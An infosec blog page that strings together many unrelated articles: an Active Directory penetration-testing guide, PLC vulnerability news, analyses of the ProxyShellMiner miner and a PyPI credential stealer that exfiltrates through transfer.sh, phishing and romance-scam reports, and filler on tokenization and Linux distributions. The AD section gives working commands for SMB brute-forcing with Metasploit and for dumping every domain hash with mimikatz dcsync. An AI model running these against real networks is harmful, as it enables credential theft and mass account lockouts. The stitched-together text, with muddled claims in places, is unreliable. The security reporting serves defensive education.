InfoSec and Compliance – With 20 years of blogging experience, DISC InfoSec blog is dedicated to providing trusted insights and practical solutions for professionals and organizations navigating the evolving cybersecurity landscape. From cutting-edge threats to compliance strategies, this blog is your reliable resource for staying informed and secure. Dive into the content, connect with the community, and elevate your InfoSec expertise!
This article covers Active directory penetration testing that can help for penetration testers and security experts who want to secure their network.
“Active DirectoryPentesting” Called as “AD penetration Testing” is a directory service that Microsoft developed for the Windows domain network. Using it you can to control domain computers and services that are running on every node of your domain.
In this section, we have some levels, the first level is a reconnaissance of your network. every user can enter a domain by having an account in the domain controller (DC).
All this information is just gathered by the user that is an AD user. In the username, there are two parts the first is the domain name and the second part is your username. like below :
Reconnaissance Commands:
+ c:\ > net user
By running this command in CMD (Command Prompt) you can easily see local users on your PC.
+ c:\ >whoami
This command can help you to see the current user associated with Active Directory logged in.
+ c:\ >whoami /groups
This command helps you to show you the current group
+ c:\ > net user \domain
This command shows you all users from any group in the active directory. also, you can see every user’s group by running this command :
+ c:\ > net user [username] domain.
To have a better look, you can user “AD Recon” script. AD Recon is a script written by “Sense of Security“.
It uses about 12 thousand lines of PowerShell script that gives you a good look to AD and all info that you will need it.
You can download this script from GitHub: https://github.com/sense-of-security/ADRecon screenshots of the report of this app:
Picture2 – List of AD GroupsPicture3 – List of DNS Record Zones
When you get all AD users, now you should take a look at the group policy. The group policy is a feature of Microsoft Windows NT family of operating systems that controls the working environment of user accounts and computer accounts. in the group policy, you can see environment policy such as”Account Lockout Policy“.
It is a method that provides you networks users to be secure from password-guessing attacks. Also, you can see “Password Policy“. A password policy is a set of rules designed to enhance computer security by encouraging users to employ strong passwords and use them properly.
When you get all the data that you need, now you can execute different attacks on users like :
Brute Force Active Directory
To brute force attack on active directory, you can use Metasploit Framework auxiliaries. You can use below auxiliary:
msf > use auxiliary/scanner/smb/smb_login
The options of this auxiliary you can set username file and password file. and set an IP that has SMB service open.
then you can run this auxiliary by entering “run” command.
If you try false passwords more than Account Lockout Policy, you can see this message “Account Has Been Locked out“.
If you try it on all accounts, all users will be disabled and you can see disorder in the network. As you can see in Password Policy, you can set your password list to brute-force.
All hashes are stored in a file named “NTDS.dit” in this location :
C:\Windows\NTDS
You will extract hashes from this file by using mimikatz. mimikatz has a feature which utilities the Directory Replication Service (DRS) to retrieve the password hashes from NTDS.DIT file. you can run it as you can see below : mimikatz # lsadump::dcsync /domain:pentestlab.local /all /csv
Then you can see hashes and password (if the password can be found).
The active directory includes several services that run on Windows servers, it includes user groups, applications, printers, and other resources.
It helps server administrators to manage devices connected with the network and it includes a number of services such as Domain, Certificate Services, Lightweight Directory Services, Directory Federation and rights management.
Active directory penetration testing is required for any organization, nowadays APT groups actively targeting Active Directories using different techniques.
In this Help Net Security video, Daniel Dos Santos, Head of Security Research at Forescout, talks about recent research, which has revealed how attackers can move laterally between vulnerable networks and devices found at the controller level of critical infrastructure. This would allow them to damage assets such as movable bridges physically.
This lateral movement lets attackers access industrial control systems and cross often-overlooked security perimeters to cause physical damage. From sensors that measure and detect pressure, temperature, flow and levels of liquids, air, and gases, to analyzers that determine chemical compositions and actuators that enable machines to move. Moving through these devices at the lowest levels, attackers can circumvent built-in functional and safety limitations to cause significant damage or disruption to services, or worse, pose a potential threat to life.
To demonstrate the potential implications, Forescout has built an industry-first proof-of-concept (PoC) which shows how attackers can move laterally on the controller level (Purdue level 1) to cause cyber and physical impact, as illustrated through the scenario of damaging a movable bridge during a closing sequence.
As part of the research, two new vulnerabilities are also being disclosed for the first time – CVE-2022-45788 and CVE-2022-45789 – which allows for remote code execution and authentication bypass, respectively, on Schneider Electric Modicon Unity Programmable Logic Controllers (PLCs).
Modicon PLCs are used in a wide range of industrial processes and critical infrastructure, including in industries such as water and wastewater, mining, manufacturing, and energy. Whilst these devices should not be accessible online, Forescout has found that close to a thousand PLCs have been exposed, with France (33%), Spain (17%), Italy (15%), and the United States (6%) revealed as the countries with the most exposed devices.
The number of devices visible is just a small indication of the popularity of these PLCs, but these devices also highlight some of the critical facilities that rely on them. For example, several devices were connected to hydro power plants, solar parks and airports.
ProxyShellMiner is being distributed to Windows endpoints by a very elusive malware operation, according to Morphisec.
To generate income for the attackers, “ProxyShellMiner” deploys cryptocurrency miners throughout a Windows domain using the Microsoft Exchange ProxyShell vulnerabilities.
“After successfully breaching an Exchange server and obtaining control, the attackers use the domain controller’s NETLOGON folder to ensure the miner executes throughout the domain, similar to how software is delivered through GPO”, Morphisec reports.
Researchers noticed that the attackers were utilizing four C2 servers. The legitimate, infected mail servers are all where the malware-dependent files are stored.
“Mining cryptocurrency on an organization’s network can lead to system performance degradation, increased power consumption, equipment overheating, and can stop services”, according to Morphisec.
Technical Analysis of the ProxyShellMiner Malware
The malware needs a command line parameter that acts as a password for the XMRig miner component in order to activate.
“This parameter is later used as a key for the XMRig miner configuration, and as an anti-runtime analysis tactic”, Morphisec
The parameter serves as an anti-analysis technique and as a password for the XMrig miner
The XOR decryption algorithm, an XOR key, and an embedded dictionary are all used by ProxyShellMiner. The subsequent embedded code modules are then executed using the C# compiler CSC.exe with “InMemory” compile parameters.
The malware then downloads a file with the name “DC DLL” and uses .NET reflection to get the task scheduler, XML, and XMRig key arguments. The decryption of additional files is done using the DLL file.
By setting up a scheduled activity to start when the user logs in, a second downloader achieves persistence on the compromised system. The report says four other files and the second loader are downloaded from a remote resource.
The deobfuscated scheduled task
Using a technique called “process hollowing,” that file determines which of the installed browsers on the hacked system would be used to inject the miner into its memory space. The mining process then starts after selecting a random mining pool from a hardcoded list.
Picking a mining pool
Setting a firewall rule that blocks all outgoing traffic and is applicable to all Windows Firewall profiles is the last stage in the attack chain. This is done to reduce the likelihood that defenders may find infection signs or get notifications about a possible compromise from the compromised system.
“The malware waits at least 30 seconds while the target machine blocks any outbound connection. It does this to tamper with the process runtime behavior analysis of common security solutions”, researchers.
Adding a firewall rule to block all outgoing traffic
Final Thoughts
ProxyShellMiner doesn’t just disrupt business networks, drive up power bills, overheat equipment, and stop services from operating. It gives threat actors access to further evil purposes.
“Once attackers have a foothold in a network, they have deployed web shells, backdoors, and used tunneling utilities to further compromise victim organizations”, Morphisec
Hence, Morphisec encourages all administrators to install all available security updates and employ thorough and all-encompassing threat detection and defense measures to reduce the danger of ProxyShellMiner attacks.
In this article, I will explain how to use Nikto on Kali Linux .
Firstly we will install the Nikto tool from Github or Using apt install command on terminal.
Using help manual of Nikto we can see various options or parameters on how we can use this tool very efficiently.
Firstly we will use the basic syntax to check the vulnerability of the website.
However, Nikto is capable of doing a scan that can go after SSL and port 443, the port that HTTPS websites use (HTTP uses port 80 by default). So we’re not just limited to scanning old sites, we can do vulnerability assessments on sites that use SSL, which is pretty much a requirement these days to be indexed in search results.
If we know it’s an SSL site that we’re targeting, we can specify it in Nikto to save some time on the scan by adding -ssl to the end of the command.
So by using this tool we can analyze the vulnerability of the website.
A large number of e-commerce payment platforms use effective payment gateway tools and effectively integrate them with an acceptable payment strategy. Today’s e-commerce websites need to integrate anti-fraud tools, renew bank cards, integrate multiple gateways, and manage alternative payment methods.
It is important to get these complex integrations right and bring them together into one functioning system; choosing the right tokenization partner is the key to success in these processes.
What is the tokenization process and why is it needed?
Tokenization is an important process of replacing sensitive data, such as credit card numbers, with unique identifying information while preserving all important data information; a tokenization solution is a form of using a unique security key to provide an appropriate level of security to important confidential data.
Think of tokenization as a secret code that uses a key to retrieve an encrypted message. Some versions of the credit card number store the last four digits; however, the remaining digits of the credit number are random.
In this case, you can safely store the token in the database. Anyone with access to this token cannot use it to compromise your credit card account. For these tokens to be used to process credit card transactions, they must be re-linked to the original credit card numbers. Typically, this mapping is performed by a secure third party. All this is done to ensure full security.
Blockchain technology is a technology that most people associate only with cryptocurrencies. This attribution is not entirely incorrect, as the blockchain was created for the Bitcoin cryptocurrency. However, much has changed since 2009 (the year Bitcoin appeared), and the scope of blockchain technology continues to actively expand.
One of the key applications of this technology today is tokenization, a secure form of digitization based on the blockchain technology mentioned above. The process of tokenization consists of assigning a specific value to a symbol, which can exist materially or immaterially, and is a digital “token” that stores data. With this efficient solution, you can securely buy and sell your assets online.
Examples of this use of tokens include the value of the stock market. Most of us associate stocks and bonds with paper-based notices of ownership of those assets, but tokenization allows us to replace those paper notices with digital versions. The implementation of traditional solutions in the digital world simplifies and optimizes a large number of important processes, making them significantly more efficient.
The terms “token” and “cryptocurrency” are often confused and used interchangeably; not surprisingly, both concepts are closely related to blockchain technology. The key difference between cryptocurrencies and tokens is that cryptocurrencies are a means of payment, whereas tokens cannot; they can be compared to a kind of chip.
A token is created using smart contracts on a specific blockchain network and can perform various key functions. Each blockchain network can contain an unlimited number of tokens.
On the other hand, a smart contract is a kind of computer program embedded in a certain blockchain network that automatically enforces the terms contained in it. Both tokens and cryptocurrencies can be transferred on the blockchain network; however, token transaction fees depend on the cryptocurrency.
What information must be provided for tokenization?
Tokenization is commonly used to protect credit card numbers, a process mandated by the Payment Card Industry Council (PCI). However, there are many different use cases, tokenization terminology allows you to learn a variety of effective tools that provide active growth in the field of security for business organizations for which it is important to reliably protect confidential data.
Consider personal or personally identifiable information. HIPPA, General Data Protection Regulation (GDPR) requires confidential processing, anonymization, and secure storage of personal data. Organizations and various business environments should use tokenization capabilities when the business needs to securely store confidential information, such as:
ID number;
Date of birth;
Gender or race;
Driver’s license;
Credit card number;
Valid phone number;
Bank account number;
Social insurance number;
Current residential address of clients;
Due to the universality of tokens, they are divided into several types that perform different functions. One of the key differences is between mutual tokens and non-splitting tokens. For example, payment tokens are used to make payments. Their function is mainly to ensure the safety of investors. Issued security tokens are protected by law and represent specific stocks, bonds, or other assets of genuine interest.
Are my tokens safe?
Undoubtedly, there are many advantages to using tokens, but is it safe to store data? Security is considered one of the most important benefits of tokenization. Stability, irreversibility of transactions, and elimination of intermediaries are just some of the characteristics that affect security when using blockchain technology.
In addition, the security of tokenization is provided by smart contracts that allow parties to trade directly. For example, selling real estate in the form of tokens does not require a notary or a real estate agent. Everything is done quickly and directly.
Note that each contracting party must ensure that personal tokens are properly stored and protected from loss to properly act as guarantors of successful transactions. Tokenization is a form of business digitization based on blockchain technology.
The potential of tokenization is huge and has yet to be fully explored. Tokens are divided into different types. The most common use of tokens is to digitize different types of assets, such as physical assets, digital assets, projects, company shares, shares, or loans.
What are the different types of tokenization processes?
When it comes to PCI tokens, there are three key types of tokenization: gateway tokenization, end-to-end tokenization, and payment service tokenization. Gateway tokenization. When you do e-commerce, you most likely get paid through a payment gateway.
Most gateways have technology that allows you to securely store your credit card in the system, then issue a refund and delete your card data. The downside is that each gateway provides its token scheme. This means that you cannot use this gateway. Changing gateways is often a time-consuming and expensive process of moving customer data to a new gateway for secure processing.
In some cases, the gateway may not allow these actions. End-to-end tokenization. Some independent tokenization providers have their technology that sits between your e-commerce site and the gateway. These end-to-end token providers allow you to use your existing gateway integration code.
One of the key advantages of this type of tokenization is that it uses existing technology and can be adapted at a very fast pace. It also has the advantage of modularity. Unlike gateway tokenization, modularity can be actively used for more than just credit card payments. You can use the tokenization model to connect to most APIs and tokenize data other than credit card data.
End-to-end tokenization is an evolution of gateway tokenization. This gives payment solutions the freedom to route transactions to different gateways in real-time, avoiding costly and time-consuming transfers of card data between different payment platforms.
Tokenization processes of various important payment services
A key tokenization strategy is the payment service model. This model offers a single API that, when integrated, can route payments to multiple gateways. The payment service model is best suited for companies with more complex payment needs.
This model works well when a company needs to pay in several regions or several different currencies or through several gateways. A disadvantage of the payment service model is that existing gateway embed code cannot be reused.
In addition to reduced PCI coverage and increased security, the tokenized payment service model has unique key benefits from its active use. The payment services model not only simplifies your embed code but also takes control of your tokens away from the payment gateway. Unlike gateway tokenization, tokens provided by third parties can be actively used with supported gateways.
Tokens issued by payment gateways cannot be used against competing alternative gateways. Security and compliance alone are reasons enough to implement a popular solution like the tokenization of various assets that are important to you, your company, and your customers.
The truth is that key security requirements for online payments are difficult to implement on your own. In particular, startups often choose to sacrifice security for time to market. Accepting online payments makes your business a target for cybercriminals. Hiring security experts and implementing effective tokenization processes can save your business environment valuable time and money in the long run.
Keep these practical tips in mind. Choose a reliable tokenization partner, test the tokenization, what level of protection you can achieve by working on the integration, and find a vendor that can integrate multiple gateways, methods, and services into a single integration. One of the key technologies needed to connect all payment solutions is tokenization.
A trusted provider fully controls tokens, provides redundancy, reduces PCI coverage, and improves the security standards in place in your business environment.
What can be tokenized?
The use cases for tokenization can grow endlessly. Since anything can be digitized, tokenization is often used in professional life. These are various business projects that can demonstrate the most practical examples of using tokenization.
Digitization of the company involves the creation of tokens that are closely related to a specific project. Tokenization techniques that add value to tokens can be used as an indispensable tool for automating processes in companies and as a means of financing them. Real estate tokenization is becoming more and more popular worldwide due to the following features: transaction speed, lack of intermediaries, and security.
The process of property tokenization involves issuing tokens on the blockchain network and linking them to certain properties. Thus, the investor becomes a co-owner or owner of a certain asset, the shares of which can be represented in tokens.
Using blockchain technology and a specially designed platform, it is also possible to assign unique numbers to gems and certain forms of ore to determine their authenticity.
Raw materials registered with digital numbers can then be identified by verifying their origin, properties, and associated processes. NFT tokens have the unique potential to revolutionize both the physical and digital art markets. Each NFT token has a unique, non-tradable value that allows you to express your interest in the rights to a work of art, making investing in art an easy and fast process.
The Linux Distros is generally acknowledged as the third of the holy triplet of PC programs, simultaneously with Windows and macOS. Here we have provided you with a top 10 best Linux distros list 2023 for all professionals.
Hence Linux can be defined as the most rebellious among the three, as it’s flexible and customization, including a bunch of various Best Linux distros designed by unique associations for various values.
Moreover, the Linux “core” (kernel) and most distros are free, which is a significant trading point for the OS when it is compared to Windows and macOS.
As there are several Linux distros are available for various situations. Even if you are behind an OS that is customized for desktops, workstations, laptops, servers, gaming, or A/V editing, there is a distro over there for everyone.
Hence, we are trying to give you a summary of the most reliable and popularLinux distros accessible, each of which is customized for desktop use.
Therefore, you can install those Linux distros on a Chromebook, PC, or Mac as a substitute for your prevailing operating system, utilize both in a dual-boot scenario, or utilize them in combination with one of the best practical tools out there.
Well, if you want a Linux distro similar to windows? Or do you like to apply commands rather than click? Or do you want something special on privacy? Each of these and several other determinants will conclude which would be the most suitable Linux Distros for you.
Usually, the top Linux distros list is customized to meet the requirements of users. For example, Kali Linux is specifically created for digital forensics and penetration testing. Hence, here in this article, we have selected the top 10 best Linux distros list and we have updated this list from PopularLinux distro 2022.
What is Linux Distro?
As we have said before that Linux is flexible and customizable, which includes a bunch of unique features for different uses.
Moreover, we can also say that Linux is a house to nearly each programming language, and it is a Unix-like operating system.
Hence, this open-source operating system is basically designed as per the Linux kernel and is usually collected in multiple Linux distributions.
Thus the Linux distributions, traditionally known as a distro, are operating systems that progressed from a software compilation based on the Linux kernel.
Various users use Linux by downloading one of the various Linux distros. Linux operating systems are most common to coders, programmers, and gamers.
Thus, we can say that Linux is a worldly gift that has formed our modern life. Well, in today’s world, we can’t imagine a particular moment outwardly technology.
Dynamic firewall Better end-user software Virtual desktop support
Elementary OS
Easy image resizing Keyboard shortcuts cheat sheet Bold use of color
Kali Linux
Full customization Full disk encryption Metapackages
MX Linux
One-click enabling event sound. Hibernation is now enabled by default. Easy and flexible installation.
Therefore, Linux has produced the most significant and meaningful innovations in the creation of modern technology.
At first, Linux was not like the form as now it is, it has evolved a long way through varied crafting and drafting from an open-source friendly association.
Thus, with no doubt, we can say that Linux does not only appear with a delicate-looking desktop manager, but it also contributes a wide range of beneficial and productive sets of free and open-source software for performing all the basic and necessary needs of the users.
Now without wasting much time, let’s get started and simply explore the whole list that we have mentioned below.
Using technology powered by AI (Artificial Intelligence), scammers can now take advantage of potential victims looking for love online by deceiving them by using modern hooks.
With the rapid advancement of AI technology, scammers now have a powerful ally in the form of popular AI tools such as ChatGPT. These tools allow scammers to create anything from seemingly harmless intro chats to elaborate love letters in a matter of seconds, making it easier than ever for them to deceive unsuspecting victims.
By leveraging the impressive capabilities of these AI tools, scammers can quickly generate custom-made content designed to prey on their target’s emotions. The use of AI-generated content has made it increasingly difficult to identify and avoid scams.
One of the most common tactics used in online dating and romance scams is the practice of “catfishing.” This involves the creation of a fake online persona to lure unsuspecting victims into a relationship with the sole intention of extracting financial gain.
The term “catfishing” derives from the act of using a fake profile to hook a victim, much like fishing with a bait hook.
Convincing Scam Messages
In a recent research report titled “Modern Love” by McAfee, over 5,000 people from around the world were presented with a sample love letter and asked to determine if it was written by a person or generated by artificial intelligence (AI).
“My dearest, The moment I laid eyes on you, I knew that my heart would forever be yours. Your beauty, both inside and out, is unmatched and your kind and loving spirit only add to my admiration for you. You are my heart, my soul, my everything. I cannot imagine a life without you, and I will do everything in my power to make you happy. I love you now and forever. Forever yours …”
According to a research report by McAfee, when presented with the above sample love letter and asked to determine if it was written by a person or generated by AI, one-third of respondents (33%) believed it was written by a person, while 31% believed it was written by an AI.
While the remaining 36% of participants were unable to determine if the letter was written by a human or a machine. The study aimed to investigate the extent to which AI-generated content is perceived as authentic and genuine in the context of romantic relationships.
User Interaction Data Analysis
A recent survey found that a majority of people (66%) have been contacted by a stranger through social media or SMS and subsequently began chatting with them. Facebook and Facebook Messenger (39%) and Instagram and Instagram direct messages (33%) were cited as the most common platforms used by strangers to initiate conversation.
Unfortunately, many of these interactions eventually led to requests for money transfers. In fact, 55% of respondents reported being asked to transfer money by a stranger.
While the majority of these requests (34%) were for less than $500, a significant number (20%) involved amounts exceeding $10,000.
More concerning, 9% of respondents were asked to provide their government or tax ID number, while 8% were asked to share their account passwords for social media, email, or banking.
Scam Detection
It has been reported that people discovered they had been catfished when they experienced the following scenarios:-
Neither a face-to-face meeting nor a video conference could be arranged. (39%)
Upon finding the scammer’s photo online, they immediately realized that it was a false representation of the scammer. (32%)
During the conversation, the person asked for personal information. (29%)
The individual did not wish to speak on the telephone. (27%)
Several typographical errors and illogical sentences were present. (26%)
If the scammer is asking for money, that is the one and only telling sign that he or she is performing an online dating or romance scam.
This kind of scam usually entails a little story as part of the request, often focusing on a hardship experienced by the scammer.
Mitigations
Here below we have mentioned all the mitigations to avoid getting tangled up in an online dating or romance scam:-
The best way to know if this new love interest is right for you is to speak with someone you trust.
It’s important to take your relationship slowly in the beginning.
If the individual uses a profile picture, try a reverse image search.
Make sure that you do not send money or gifts to anyone who you have not met personally before.
Whenever you receive a friend request from a stranger, say no.
If you have any personal information on any unwanted website, make sure you clean it up.
It is strongly advised that you do not click on any malicious links that have been sent to you by a scammer.
A chatbot like ChatGPT is a very powerful tool, but it is important to keep in mind that it is only a tool, and inherently, there is neither good nor bad about it.
As long as the user decides how to use it, it is then up to them to decide how they will be able to make use of it.
YOUR DEVICES AND apps really, really want to know where you are—whether it’s to tell you the weather, recommend some restaurants you might like, or better target advertising at you. Managing what you’re sharing and what you’re not sharing, and when, can quickly get confusing.
It’s also possible that you have inconsistencies in the various location histories logged by your devices: Times when you thought you’d switched off and blocked location sharing but you’re still being tracked, or vice versa.
Here we’ll cover everything you need to consider when it comes to location tracking, and hopefully simplify it along the way. Whether you want to give out access to your current location or not, you should be in control of these settings, and not be caught unawares by additional options that you missed.How Location Tracking Gets Confusing
What happens if you distinctly remember turning location tracking off on a device, yet your position is still popping up on a map? Or maybe you thought you’d left the feature on, yet you’re seeing gaps in your location history? There are a few explanations, but essentially you need to remember all the different ways your location can be logged: by your devices, by your apps, and by websites you visit.
For example, you might have disabled location tracking on a phone but left it enabled on a tablet. Alternatively, you might have a laptop that’s tracking where you are in the background, even though you thought you’d disabled the feature in the apps you use. If you want location tracking completely enabled or disabled, you need to factor in all these different ways of keeping tabs on where you are.
If you have a Google account, this is a good illustration. Head to your account settings on the web, then choose Data and Privacy and Location History. Select Devices on This Account, which may reveal some phones, tablets, and laptops that you’d forgotten about—any device with a check next to it in this list is saving your movements to your Google account for future reference.
You can click Turn Off to disable this, but note the caveats that are listed in the confirmation box that appears onscreen: Your location might still be logged by your mobile devices, by the Find My Device service that helps you recover lost hardware, and by Google Maps when you’re navigating or searching around the area you’re in. This Location History setting is more of an overall toggle switch, affecting features such as the Google Timeline and the ability to quickly look up places you visit regularly.
From the main Google account screen, there are several more places where your location gets logged and shared: Click Data and Privacy then Web & App Activity to manage location data saved by Google Maps and other apps and websites, and click People andSharing then Manage Location Sharing to see a list of specific contacts who can see where you are through various Google services.Managing Location Tracking on Mobile
The steps to manage your location on Android vary slightly depending on the manufacturer of your phone, but the menus and instructions involved are broadly similar. On Google Pixel devices, you can open up Settings then select Location: You’ll see the Use Location toggle switch, and if you turn this off, none of your apps will be able to know where you are, nor will Google.
If you leave the Use Location toggle switch on, you can customize location access for individual apps further down on the same screen. Note that you can choose to allow apps to know where you are at all times, or only when the app in question is running in the foreground—tap on any app in the list to make changes.
Over on iOS, it’s a similar setup. If you select Privacy & Security from Settings, and then tap Location Services, you can turn off location tracking for the phone and all the apps on it. If you choose to leave this enabled, you can manage individual app access to your location via the list underneath. As on Android, you can choose to restrict apps to knowing your location only when the particular app itself is running, or allow them to monitor it in the background too.MOST POPULAR
Erasing the location data that’s been collected on you is a complex process, as you need to check the records and the settings of every app that’s ever had access to your location. For Google and Google’s apps, you can head to your Google account on the web, then choose either Location History or Web & App Activity under Data and Privacy to wipe this data from the record. You’ll also find options for automatically deleting this data after 3, 18, or 36 months.
Apple doesn’t log your movements in quite the same way, but it does build up a list of places you visit frequently (like your home and perhaps your office) so you can quickly get to them again. To clear this list on your iPhone, open Settings then choose Privacy & Security, Location Services, System Services, and Significant Locations. You can clear this list and stop it from populating in the future.Managing Location Tracking on Desktop
Your laptop or desktop computer is unlikely to be fitted with GPS capabilities, so it won’t track your location in quite the same way as your phone, but applications, websites, and the operating system will still have some idea where you are—primarily through the locations that you sign into the web from (via your home Wi-Fi, for example).
On Windows, you can open up Settings and then choose Privacy & Security and Location. As on Android and iOS, you’ll see you can turn location tracking off for individual applications (via the toggle switches on the right) or shut it down for the entire computer (the option at the top). The same screen lets you see which apps have been using your location, and enables you to wipe the log of your travels—click Clear next to Location History to do this.
When it comes to the same process on macOS, you need to click the Apple menu and select System Settings, Privacy & Security, and Location Services. The next screen looks very similar to the Windows one, with toggle switches for individual applications as well as for macOS itself—turn off any of the switches where you don’t want location access to be given. If you click Details next to System Services on this screen, you can clear the list of “significant locations” Apple has saved for you, just like on iOS.
If location tracking is on for your computer and your browser of choice, that means individual websites such as Facebook, Amazon, or the Google Search can know where you are as well. Sometimes this is useful, of course (for getting the right weather forecast), but there might be times when you want to turn it off if you’re trying to keep your whereabouts private.
Recently, the FortiGuard Labs team made a groundbreaking discovery of several new zero-day attacks in the PyPI packages. The source of these attacks was traced back to a malware author known as “Core1337.” This individual had published a number of packages.
Here below we have mentioned the packages that are published by Core1337:-
3m-promo-gen-api
Ai-Solver-gen
hypixel-coins
httpxrequesterv2
httpxrequester
Between the 27th of January and the 29th of January 2023, these attacks were published. The recent discovery made by the FortiGuard Labs team revealed that each of the packages published by the malware author “Core1337” had only one version with an empty description.
However, what was alarming was the fact that all of these packages contained similar malicious code. This raises the question of the level of sophistication and the intentions behind these attacks.
Technical Analysisof the Packages
First of all, cybersecurity analysts have noticed something that looks like a URL for a webhook in its setup[.]py file:-
There is a similar code in each package’s setup.py file except for the URL of the webhook that is sent from each package. It appears that the URL in question may have a connection to the infamous “Spidey Bot” malware.
This particular strain of malware is notorious for its ability to pilfer personal information via Discord, as highlighted in a recent blog post by the organization. The blog, entitled “Web3-Essential Package,” delves into the dangers posed by the “Spidey Bot.”
Experts in the field have discovered potential malicious behaviors in a recent static analysis that was conducted by reviewing the setup.py script. During this process, the experts meticulously examined the code and were able to identify several key indicators that point toward malicious intent.
Experts in the field of malware analysis have gained a general understanding of the behavior of a particular strain of malware by carefully examining its primary function.
According to their findings, this malware may attempt to extract sensitive information from various browsers and the Discord platform and then store it in a file for later exfiltration.
In order to gain a better understanding of the inner workings of this piece of malware, experts have focused their attention on the “getPassw” function. This function is specifically designed to gather user and password information from the browser and then save it to a text file.
The malware has a self-proclaimed title of “Fade Stealer,” which it prominently displays in the form of its name being written at the top of its accompanying text file.
As for its ‘getCookie’ function, the behavior is similar to the one seen in its other functions. Based on the functions of “Kiwi,” “KiwiFile,” and “uploadToAnonfiles,” it appears that the malware is programmed to scan specific directories and select specific file names for the purpose of transferring them through a file-sharing platform:-
https[:]//transfer[.]sh
All these packages have one thing in common – they possess similar codes that are created for the purpose of launching attacks. While all these packages may have different names, the underlying intention and code structure is the same, which indicates the work of a single author.
Welcome to our February 2023 review of phishing attacks, in which we explore the latest email scams and the tactics that cyber criminals use to trick people into handing over personal data.
This month, we look at a UK government warning about a resurgence in Russian cyber attacks and concerns that the much-discussed AI programme ChatGPT could be used for fraud.
UK government warns of Russian-sponsored phishing campaign
The UK government has issued a warning amid an increase in phishing attacks stemming from Russia and Iran.
In an advisory statement, the NCSC (National Cyber Security Centre) shared details about the campaign, which appears to have been sponsored by the fraudsters’ national governments.
The researchers are most concerned about spear phishing, which is a sophisticated form of fraud. Scammers target specific individuals by researching them online – often using Facebook, LinkedIn or the website of the target’s employer.
Although spear phishing emails often contain the same clues as regular phishing scams, they have a much higher success rate. This suggests that people are more likely to assume that a message is genuine if it contains a few specific details about them, such as their name or their place of work.
The NCSC’s advisory highlights ongoing scams that were conducted throughout last year by the Russia-based group SEABORGIUM and the Iran-based group TA453, also known at APT42.
Their attacks target specific sectors within the UK, including academia, defence, governmental organisations, NGOs and thinktanks, as well as politicians, journalists and activists.
Commenting on the findings, NCSC Director of Operations Paul Chichester said: “The UK is committed to exposing malicious cyber activity alongside our industry partners and this advisory raises awareness of the persistent threat posed by spear-phishing attacks.
“These campaigns by threat actors based in Russia and Iran continue to ruthlessly pursue their targets in an attempt to steal online credentials and compromise potentially sensitive systems.
“We strongly encourage organisations and individuals to remain vigilant to potential approaches and follow the mitigation advice in the advisory to protect themselves online.”
Experts concerned that ChatGPT could be used for scams
ChatGPT has taken the Internet by storm, with the AI-backed tool helping writers and hobbyists create content almost instantly.
The program’s advanced language model has been championed by people looking to quickly produce quotes, articles and think pieces. However, cyber security experts are warning that another group – scammers – could also embrace the technology.
As Chester Wisniewski, the principal research scientist as Sophos, explained, ChatGPT can instantly produce grammatically correct and natural-looking writing, which would resolve one the biggest challenges that scammers face when creating their baits.
“The first thing I do whenever you give me something is figuring out how to break it. As soon as I saw the latest ChatGPT release, I was like, ‘OK, how can I use this for bad things?’ I’m going to play to see what bad things I can do with it,” Wisnieski told TechTarget.
One of those ‘bad things’ that he considered was the ability for ChatGPT to create phishing scams.
“If you start looking at ChatGPT and start asking it to write these kinds of emails, it’s significantly better at writing phishing lures than real humans are, or at least the humans who are writing them,” he said.
“Most humans who are writing phishing attacks don’t have a high level of English skills, and so because of that, they’re not as successful at compromising people.
“My concerns are really how the social aspect of ChatGPT could be leveraged by people who are attacking us. The one way we’re detecting them right now is we can tell that they’re not a professional business.
“ChatGPT makes it very easy for them to impersonate a legitimate business without even having any of the language skills or other things necessary to write a well-crafted attack.”
Can you spot a scam?
All organisations are vulnerable to phishing, no matter their size or sector, so it’s essential to understand how you might be targeted and what you can do to prevent a breach.
This 45-minute course uses real-world examples like the ones we’ve discussed here to explain how phishing attacks work, the tactics that cyber criminals use and how you can detect malicious emails.
The field of computer Forensics Analysis involves identifying, extracting, documenting, and preserving information that is stored or transmitted in an electronic or magnetic form (that is, digital evidence).
Forensics Analysis – Volatile Data:
The data that is held in temporary storage in the system’s memory (including random access memory, cache memory, and the onboard memory of system peripherals such as the video card or NIC) is called volatile data because the memory is dependent on electric power to hold its contents.
When the system is powered off or if power is disrupted, the data disappears.
After the capture of live data of RANDOM ACCESS MEMORY, we will analyze it with Belkasoft Evidence Center Ultimate Tool.
Acquisition of live Volatile Memory:
Run the tool as an administrator and start the capture.
Belkasoft RAM Capture
Dump File Format:
After the successful capture of live Ram memory. The file is will be saved in the .mem extension.
Dumping File
Evidence File Analyser:
Belkasoft Evidence Center Ultimate Tool to analyze volatile memory.
Evidence Analyzer
A forensic examiner or Incident Responder should record everything about the physical device’s appearance, Case number, Model Number of Laptop or Desktop, etc.
Data Storage
Click the Ram Image and enter the path of the .mem file which is a live ram dump file.
Malicious Activities on the Public website
In the above picture, the attacker is trying for SQL Injection on Public Website.
Anonymous Vpn
In the above figure attacker installed and executed for hiding the source ip address.
Mail Inbox
The attacker has logged on with some public mail servers, and now forensic examiners are able to read inbox emails.
Recent File Accessed
Attackers last accessed file directory paths. The Forensics examiner will have priority to investigate this path for suspicious files.
Pictures
Recent Pictures downloaded from websites will be stored in the cache memory.
There are many relatively new tools available that have been developed in order to recover and dissect the information that can be gleaned from volatile memory.
This is a relatively new and fast-growing field many forensic analysts do not know or take the advantage of these assets.
Volatile memory may contain many pieces of information relevant to a forensic investigation, such as passwords, cryptographic keys, and other data.
Identity isn’t a security problem — it’s the security problem.
This was the takeaway from my recent meeting with a local government CISO in the Washington, D.C. area. Tasked with protecting infrastructure, including the fire and police departments, the CISO turned to CrowdStrike a year ago for endpoint and identity protection.
The CISO outlined the main challenge his team faced: the managed detection and response (MDR) solution in use at the time was unable to keep up with modern security demands. The tool didn’t deliver the speed or fidelity he needed. Nor did it provide remediation, leading to long delays between when the tool sent data to the management console and when his thinly stretched security team could investigate and triage alerts.
CrowdStrike Falcon® Complete solved these problems by providing a bundle of Falcon modules on AWS GovCloud, complete with a virtual team of experts to administer the technology and quickly eliminate threats.
“There’s a complete difference between our previous MDR and CrowdStrike Falcon Complete. One gives me work to do. The other tells me the work is done.” –CISO, A county in the Washington, D.C. area
Identity Is the New Perimeter
Of everything the CISO shared, it was the identity piece that really stood out to me. According to the CrowdStrike 2022 Global Threat Report, nearly 80% of cyberattacks leveraged compromised credentials — a trend the county sees regularly, he said.
